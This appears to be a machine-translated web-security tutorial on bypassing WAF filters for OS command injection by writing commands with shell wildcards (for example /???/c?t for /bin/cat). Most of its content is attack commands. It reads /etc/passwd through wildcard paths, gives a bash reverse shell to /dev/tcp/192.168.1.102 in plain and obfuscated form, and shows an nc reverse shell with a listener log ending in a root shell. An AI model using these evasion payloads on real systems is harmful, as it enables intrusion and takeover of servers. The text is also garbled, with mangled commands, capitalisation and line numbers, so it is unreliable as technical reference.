First, the introduction of wildcard characters:
In general, the wildcard contains * and?, are English symbols, * used to match any arbitrary character,? to match an arbitrary character.
For example, using wildcards to view files, you can see that the punch-in file is/etc/resolv.conf:
1 sudo Head -5 /??? /R???? V.c?? F 2 # 3 # MacOS Notice 4 # 5 file for hostname resolution, Address 6 # Resolution, or the DNS query routing mechanism used by most
Similarly, when deleting a file, delete all files that begin with a:
1 RM -F *
Here's a brief explanation of what a wildcard is.
Second, a shell that supports wildcard characters
As can be seen from the above, the Linux, Unix-like operating system command line for parameters or command values are wildcard characters, the name command itself supports wildcards?
1└─[$]>sudo/??? /c?t/??? /R???? V.? O?F2 #3 # MacOS Notice4 #5# thisfileis not consulted forDnshostnameresolution, Address6 # Resolution, or the DNS query routing mechanism used by most7 # Processes on the this system.8 #9 # to-View the DNS configuration used by this system, use:Ten# Scutil--DNS One # A # See ALSO -# DNS-SD (1), Scutil (8) - # the# thisfileis automatically generated. -#
As you can see, the command is partially identified/??? /c?t =/bin/cat
Third, WAF rule set:
The WAF engine-based set of rules for detection and response (release or blocking) of the payload part
For example, payload filtering for OS Command injection:
Rule1 Filter | (%7c) Character & URL encoding%26 even/(%2f) and so on, filter back quotes '
Rule2 filter command keyword and so on
Rule3-a regular expression match
Four, around the WAF
1, found/ETC/PASSWD, will alarm,/??? /P???? D is not, because the matching regular is likely to write the match/[\w]{1,}/[\w]{1,} for Rule3
2. Give a bash simple command to bounce the shell, which is appropriate for Rule2
// normal Bounce shell commands #bash-i >&/dev/tcp/192.168. 1. 102/44440> &1#/??? /b?? H-i >&/dev/tcp/192.168. 1. 102/44440>&1 can be successful
In testing an example of a direct bounce using NC:
1 #正常情况下: 2 192.168. 1.101 4444 3 4444 -l-v
can be converted into:
1 192.168. 1.101 4444 2 # I have a NL command here/bin, so N can't get out, otherwise you can use n? To replace the NC, and the IP address can be converted to a long integer
Results
1 [********@***]# nc-p 4444 -L-v 2 ncat:version 6.40 (Http:// nmap.org/ncat) 3 ncat:listening on::: 4444 4 ncat:listening on 0.0 . 0.0 : 4444 5 ncat:connection from ******. 6 ncat:connection from ******:43568 7 whoami 8 Root
It's done.
In conclusion, this method is still very useful.
The fifth chapter of Web security--about using wildcard characters for OS command injection around WAF